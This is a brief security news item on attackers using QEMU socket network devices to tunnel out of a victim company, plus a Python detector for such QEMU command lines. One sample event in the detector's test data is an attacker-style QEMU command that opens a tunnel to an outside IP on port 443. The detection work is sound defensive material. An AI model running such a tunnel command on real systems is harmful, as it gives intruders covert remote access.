Malicious actors were detected abusing the open-source hypervisor platform QEMU as a tunneling tool in a cyberattack against a large company.
QEMU is a free emulator and hypervisor that allows you to run other operating systems as guests on a computer.
As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server. This allowed the threat actors to create a network tunnel from the victim’s system to the attacker’s server with negligible impact on system performance.
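For defenders, the socket-type network device described above is visible in the QEMU process command line. The following is an added example, not code from the original report: it parses `-netdev` arguments from process-creation events and flags socket backends that connect to a non-loopback peer. The sample events, addresses and function names are constructed for illustration.

```python
import ipaddress
import shlex

# Constructed process-creation command lines (not taken from the incident).
SAMPLE_EVENTS = [
    r'"C:\Tools\qemu\qemu-system-i386.exe" -nographic -netdev socket,id=n1,connect=203.0.113.10:443',
    r'qemu-system-x86_64 -m 4G -hda dev.qcow2 -netdev user,id=n0 -device e1000,netdev=n0',
    r'qemu-system-x86_64 -m 2G -netdev socket,id=n1,connect=127.0.0.1:9000',
]

def parse_netdevs(cmdline):
    """Return one dict per -netdev argument: {'type': ..., option: value, ...}."""
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    netdevs = []
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-netdev":
            fields = tokens[i + 1].split(",")
            dev = {"type": fields[0]}
            for field in fields[1:]:
                key, _, value = field.partition("=")
                dev[key] = value
            netdevs.append(dev)
    return netdevs

def is_remote(host):
    """Loopback and empty hosts are local; other IPs and any hostname are remote."""
    host = host.strip("[]")
    if host.lower() in ("", "localhost"):
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True  # a hostname we cannot classify: treat as remote

def find_socket_tunnels(cmdline):
    """Return (host, port) for each socket netdev that dials out to a remote peer."""
    if "qemu" not in cmdline.lower():
        return []
    hits = []
    for dev in parse_netdevs(cmdline):
        if dev["type"] == "socket" and "connect" in dev:
            host, _, port = dev["connect"].rpartition(":")
            if is_remote(host):
                hits.append((host.strip("[]"), port))
    return hits

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(find_socket_tunnels(event), "<-", event)
```

A hit is a lead for triage rather than a verdict, since socket backends are also used legitimately to link virtual machines across lab hosts.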